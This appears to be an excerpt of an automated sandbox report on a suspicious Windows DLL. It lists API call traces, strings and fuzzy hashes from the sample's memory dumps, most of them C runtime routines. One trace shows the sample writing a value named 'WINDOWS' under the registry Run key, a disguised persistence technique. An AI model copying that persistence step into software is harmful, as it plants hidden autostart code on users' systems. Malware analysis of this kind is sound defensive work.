                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide_memsetlstrlen
                                      • String ID:
                                      • API String ID: 2586284713-0
                                      • Opcode ID: d911082b38051004a8d0416c071725fd4c5288d31242397fc781a2e52cb4ff93
                                      • Instruction ID: 0e26fefe237c7f933e3aefcad97af7072ba5ef857c34500f5961db1f97447f11
                                      • Opcode Fuzzy Hash: d911082b38051004a8d0416c071725fd4c5288d31242397fc781a2e52cb4ff93
                                      • Instruction Fuzzy Hash: 6D311A75A40228AFDB10DBA0CC8CEDA77B8EF59704F2045D8F419DB250DA709A81CFA0
                                      APIs
                                      • __CreateFrameInfo.LIBCMT ref: 6E340AE6
                                        • Part of subcall function 6E33C6BB: __getptd.LIBCMT ref: 6E33C6C9
                                        • Part of subcall function 6E33C6BB: __getptd.LIBCMT ref: 6E33C6D7
                                      • __getptd.LIBCMT ref: 6E340AF0
                                        • Part of subcall function 6E33E6A9: __getptd_noexit.LIBCMT ref: 6E33E6AC
                                        • Part of subcall function 6E33E6A9: __amsg_exit.LIBCMT ref: 6E33E6B9
                                      • __getptd.LIBCMT ref: 6E340AFE
                                      • __getptd.LIBCMT ref: 6E340B0C
                                      • __getptd.LIBCMT ref: 6E340B17
                                      • _CallCatchBlock2.LIBCMT ref: 6E340B3D
                                        • Part of subcall function 6E33C760: __CallSettingFrame@12.LIBCMT ref: 6E33C7AC
                                        • Part of subcall function 6E340BE4: __getptd.LIBCMT ref: 6E340BF3
                                        • Part of subcall function 6E340BE4: __getptd.LIBCMT ref: 6E340C01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                      • String ID:
                                      • API String ID: 1602911419-0
                                      • Opcode ID: d57c1a43f4be4847590197750f8d8a2d9b85cd057db02aefe064c11902556c31
                                      • Instruction ID: f32337600d9e991d44fcdc4e4443fa9f945c3eef75f2af81afa66b721a6fea05
                                      • Opcode Fuzzy Hash: d57c1a43f4be4847590197750f8d8a2d9b85cd057db02aefe064c11902556c31
                                      • Instruction Fuzzy Hash: 7211E4B1D00359DFDB00DFE5E444ADDBBB4FB04318F21846AE854AB351DB389A119F54
                                      APIs
                                      • __getptd.LIBCMT ref: 6E33DD0B
                                        • Part of subcall function 6E33E6A9: __getptd_noexit.LIBCMT ref: 6E33E6AC
                                        • Part of subcall function 6E33E6A9: __amsg_exit.LIBCMT ref: 6E33E6B9
                                      • __amsg_exit.LIBCMT ref: 6E33DD2B
                                      • __lock.LIBCMT ref: 6E33DD3B
                                      • InterlockedDecrement.KERNEL32(?), ref: 6E33DD58
                                      • _free.LIBCMT ref: 6E33DD6B
                                      • InterlockedIncrement.KERNEL32(02441658), ref: 6E33DD83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 09c5aa9456e5ac67cf8d37b9a525cc5ca13999b6b5ac6ba62683fc5e1eb574ac
                                      • Instruction ID: 9f33fb89b2f8ab7c5a2a464621eaa14d854008e1f46317ae05a486e5faf7097d
                                      • Opcode Fuzzy Hash: 09c5aa9456e5ac67cf8d37b9a525cc5ca13999b6b5ac6ba62683fc5e1eb574ac
                                      • Instruction Fuzzy Hash: 5801C075A00EB2EBDB419FE58040F8D77E8BF0171AFB10A06E454A7684CB319941CFE1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __calloc_crt
                                      • String ID: 5n$H5n$5n
                                      • API String ID: 3494438863-3489482061
                                      • Opcode ID: 819d60c5699a90432e22f002a0c50dd0802203d3bac00d6364f2750de7351538
                                      • Instruction ID: 09a4deaac30a7e8d7c19413d5b854c876a7876099c384daae30e43c1a5b1319e
                                      • Opcode Fuzzy Hash: 819d60c5699a90432e22f002a0c50dd0802203d3bac00d6364f2750de7351538
                                      • Instruction Fuzzy Hash: BC11E33665DB725BEB448D9EEC40F9633A9BB86328775026BE111CB3D4FB71DC818A40
                                      APIs
                                      • ___BuildCatchObject.LIBCMT ref: 6E340E7E
                                        • Part of subcall function 6E340DD9: ___BuildCatchObjectHelper.LIBCMT ref: 6E340E0F
                                      • _UnwindNestedFrames.LIBCMT ref: 6E340E95
                                      • ___FrameUnwindToState.LIBCMT ref: 6E340EA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                      • String ID: csm$csm
                                      • API String ID: 2163707966-3733052814
                                      • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                      • Instruction ID: 669b7b618e7717d501cc1fd8d1bf43d6b2a6a6418e495adccdbac0d02c1265c0
                                      • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                      • Instruction Fuzzy Hash: BB01123110061AFBDF029F91CC44EEB7EAAEF58354F008414B9A829120E77298B1DFA2
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(?,SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN,00000000,000F013F,?), ref: 6E3328AA
                                      • RegSetValueExA.ADVAPI32(?,WINDOWS,00000000,00000001,?,?), ref: 6E3328D4
                                      • RegCloseKey.ADVAPI32(?), ref: 6E3328DF
                                      Strings
                                      • SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, xrefs: 6E3328A2
                                      • WINDOWS, xrefs: 6E3328CC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: CloseOpenValue
                                      • String ID: SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN$WINDOWS
                                      • API String ID: 779948276-2915470531
                                      • Opcode ID: 31a96936ea6448e688767af5f3a5656d7e9a1e79f099d6e0bb2d34a80abd8db8
                                      • Instruction ID: 239dba1190320a203bd732a327b8840495de768d37f04529e2ec0284bb06705c
                                      • Opcode Fuzzy Hash: 31a96936ea6448e688767af5f3a5656d7e9a1e79f099d6e0bb2d34a80abd8db8
                                      • Instruction Fuzzy Hash: 35F069312642AAFFDB129EE4CC48FB63B69AB01740F204424FA14DB560EA729414EB90
                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6E332DF9
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 6E332E04
                                        • Part of subcall function 6E33A733: _malloc.LIBCMT ref: 6E33B9C2
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 6E332E1F
                                      • CloseHandle.KERNEL32(?), ref: 6E332E32
                                      • CloseHandle.KERNEL32(?), ref: 6E332E3E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: File$CloseHandle$CreateReadSize_malloc
                                      • String ID:
                                      • API String ID: 3763301335-0
                                      • Opcode ID: 48f28e11746d7797c2bccd995431f7065bc70ba9d071b7820309bd9dd2e22af8
                                      • Instruction ID: d533ba68e5abaaa3def4cbfd13e8232476c5a54e53f39d18209f294a5c6dd936
                                      • Opcode Fuzzy Hash: 48f28e11746d7797c2bccd995431f7065bc70ba9d071b7820309bd9dd2e22af8
                                      • Instruction Fuzzy Hash: CB11A572600524BAEB212BB2DC88EEB3F7CEF45794F204425F9499A140EF719E41D6F0
                                      APIs
                                      • __getptd.LIBCMT ref: 6E33E48C
                                        • Part of subcall function 6E33E6A9: __getptd_noexit.LIBCMT ref: 6E33E6AC
                                        • Part of subcall function 6E33E6A9: __amsg_exit.LIBCMT ref: 6E33E6B9
                                      • __getptd.LIBCMT ref: 6E33E4A3
                                      • __amsg_exit.LIBCMT ref: 6E33E4B1
                                      • __lock.LIBCMT ref: 6E33E4C1
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 6E33E4D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 8ae5394ec6dec7986fde3e7f1d19134432dc52f5c609ace3dadb685f023410ad
                                      • Instruction ID: fba466a29e06694c9c53f6e65865173679ba366f0fe7edda5f85e1a5480635ab
                                      • Opcode Fuzzy Hash: 8ae5394ec6dec7986fde3e7f1d19134432dc52f5c609ace3dadb685f023410ad
                                      • Instruction Fuzzy Hash: 87F090329147B1DBE7509BE6A801FCD73A86F04328F714A0AE4D4AA2D0CB255D008E55
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E3446F9
                                      • __isleadbyte_l.LIBCMT ref: 6E34472C
                                      • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,C4830000,?,00000000,?,?,?,6E3313C8,?,grams), ref: 6E34475D
                                      • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,00000001,?,00000000,?,?,?,6E3313C8,?,grams), ref: 6E3447CB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 3036d0ef997cae8503587e1b68a0e35a90d269007347eceab3530630eaf1eec5
                                      • Instruction ID: 91dd25782932ed667495faa543cfe913726637c0ffd2c2fc571f27e18112b358
                                      • Opcode Fuzzy Hash: 3036d0ef997cae8503587e1b68a0e35a90d269007347eceab3530630eaf1eec5
                                      • Instruction Fuzzy Hash: 9331A035A14296EFEB10DFA4C890DAA3FF5AF02315B2185B9E4708B190E732DA52DB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction ID: d5c604f9a3a105bd36331896e8078b1b14ff3f78e2e0a453f1167f270e56a222
                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction Fuzzy Hash: 8211783300458AFBCF425EC4CC018EE3FA6BF09358B448A15FA6859030D333C9BAAB81
                                      APIs
                                      • _malloc.LIBCMT ref: 6E33B9C2
                                        • Part of subcall function 6E33B16B: __FF_MSGBANNER.LIBCMT ref: 6E33B184
                                        • Part of subcall function 6E33B16B: __NMSG_WRITE.LIBCMT ref: 6E33B18B
                                        • Part of subcall function 6E33B16B: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6E33FCB4,00000000,00000001,00000000,?,6E33F3FD,00000018,6E34D360,0000000C,6E33F48D), ref: 6E33B1B0
                                      • std::exception::exception.LIBCMT ref: 6E33B9F7
                                      • std::exception::exception.LIBCMT ref: 6E33BA11
                                      • __CxxThrowException@8.LIBCMT ref: 6E33BA22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                      • String ID:
                                      • API String ID: 1414122017-0
                                      • Opcode ID: bded8c790ab63b45fa7472a0fe7a8be5145c754bbb95d4f79cc8a766a7f8e754
                                      • Instruction ID: a0b5d78a3b9c25ec939a13b12df8d650088da7e477c870583f762e3081ed4ec3
                                      • Opcode Fuzzy Hash: bded8c790ab63b45fa7472a0fe7a8be5145c754bbb95d4f79cc8a766a7f8e754
                                      • Instruction Fuzzy Hash: 8CF0F4714009AAAADF00DFD4CC11EDE3BFD9B01718F700815E850EE294DB718E05D790
                                      APIs
                                      • __EH_prolog3_catch.LIBCMT ref: 6E33A470
                                      • std::_Xinvalid_argument.LIBCPMT ref: 6E33A487
                                        • Part of subcall function 6E33A678: std::exception::exception.LIBCMT ref: 6E33A68D
                                        • Part of subcall function 6E33A678: __CxxThrowException@8.LIBCMT ref: 6E33A6A2
                                        • Part of subcall function 6E33A678: std::exception::exception.LIBCMT ref: 6E33A6B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
                                      • String ID: vector<T> too long
                                      • API String ID: 1877048013-3788999226
                                      • Opcode ID: 30afe97aea2d7fb58f0f439c18f02478ae2d625da1f3160fd7573610caddc3a2
                                      • Instruction ID: 23c54983e4b6ace091e9dbad39f96f396b092c41f9b67355f1e77f285b3b787b
                                      • Opcode Fuzzy Hash: 30afe97aea2d7fb58f0f439c18f02478ae2d625da1f3160fd7573610caddc3a2
                                      • Instruction Fuzzy Hash: 65217732E00269CBDF04DFE8C585E9DBBB6AF44310F25855AE944AF250C776ED40CBA0
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 6E335815
                                        • Part of subcall function 6E33A6C5: std::exception::exception.LIBCMT ref: 6E33A6DA
                                        • Part of subcall function 6E33A6C5: __CxxThrowException@8.LIBCMT ref: 6E33A6EF
                                        • Part of subcall function 6E33A6C5: std::exception::exception.LIBCMT ref: 6E33A700
                                      • _memmove.LIBCMT ref: 6E33584B
                                      Strings
                                      • invalid string position, xrefs: 6E335810
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1785806476-1799206989
                                      • Opcode ID: 1a72dba8679aa5428c878ab4d5055cd2667250b253b1d8bd3d05429677da4710
                                      • Instruction ID: bcc254a68ef7d4c0f0a44feeb92b950df314e120ab676354b4c314f48d47a2ce
                                      • Opcode Fuzzy Hash: 1a72dba8679aa5428c878ab4d5055cd2667250b253b1d8bd3d05429677da4710
                                      • Instruction Fuzzy Hash: 150186317116A19BE3208DEDE880D2B77F6EB81A017744D3CD586CFE45DBB4E84687A1
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 6E33A398
                                        • Part of subcall function 6E33A678: std::exception::exception.LIBCMT ref: 6E33A68D
                                        • Part of subcall function 6E33A678: __CxxThrowException@8.LIBCMT ref: 6E33A6A2
                                        • Part of subcall function 6E33A678: std::exception::exception.LIBCMT ref: 6E33A6B3
                                      • _memset.LIBCMT ref: 6E33A3DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memsetstd::_
                                      • String ID: string too long
                                      • API String ID: 3227870734-2556327735
                                      • Opcode ID: 6f3196446ecbdc84267793a44709cf95a0564f62512ca6ae15f13dcd7ba7114b
                                      • Instruction ID: 3e964be8821c1cd5db2667a0aa419654255fa253aba181b12975106d519dc10c
                                      • Opcode Fuzzy Hash: 6f3196446ecbdc84267793a44709cf95a0564f62512ca6ae15f13dcd7ba7114b
                                      • Instruction Fuzzy Hash: 03018F307246F2DFEF149EAC9890F58F369FB12334B300619E4118B691C7A5E890C7A2
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 6E33A40E
                                        • Part of subcall function 6E33A678: std::exception::exception.LIBCMT ref: 6E33A68D
                                        • Part of subcall function 6E33A678: __CxxThrowException@8.LIBCMT ref: 6E33A6A2
                                        • Part of subcall function 6E33A678: std::exception::exception.LIBCMT ref: 6E33A6B3
                                      • _memmove.LIBCMT ref: 6E33A435
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: vector<T> too long
                                      • API String ID: 1785806476-3788999226
                                      • Opcode ID: a2ffb68052cf678469ac16dd3b5882ed93affe38dcd03e7d15c4c07aa795d871
                                      • Instruction ID: d4aac3526c71af7c7b51221cb022549d5801669e3e02f772a48a9977840a0d87
                                      • Opcode Fuzzy Hash: a2ffb68052cf678469ac16dd3b5882ed93affe38dcd03e7d15c4c07aa795d871
                                      • Instruction Fuzzy Hash: 420162716006559FDB24CFEDD894C5AB7ECEF443147248A2EE49AC7350EB31F9408B50
                                      APIs
                                        • Part of subcall function 6E33C70E: __getptd.LIBCMT ref: 6E33C714
                                        • Part of subcall function 6E33C70E: __getptd.LIBCMT ref: 6E33C724
                                      • __getptd.LIBCMT ref: 6E340BF3
                                        • Part of subcall function 6E33E6A9: __getptd_noexit.LIBCMT ref: 6E33E6AC
                                        • Part of subcall function 6E33E6A9: __amsg_exit.LIBCMT ref: 6E33E6B9
                                      • __getptd.LIBCMT ref: 6E340C01
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: csm
                                      • API String ID: 803148776-1018135373
                                      • Opcode ID: 7523133565be414cd856ced43ccda599680fa54a0c9cf382f8eaacd00675d6c1
                                      • Instruction ID: f101382d1a3225e105f1cd41264747d2634557e6088bbb58d40b26b70263ce46
                                      • Opcode Fuzzy Hash: 7523133565be414cd856ced43ccda599680fa54a0c9cf382f8eaacd00675d6c1
                                      • Instruction Fuzzy Hash: D8014B39A11325CEDFA48FE1D450F9DB3F9AF24215F64486ED4919A260EB33C984CF52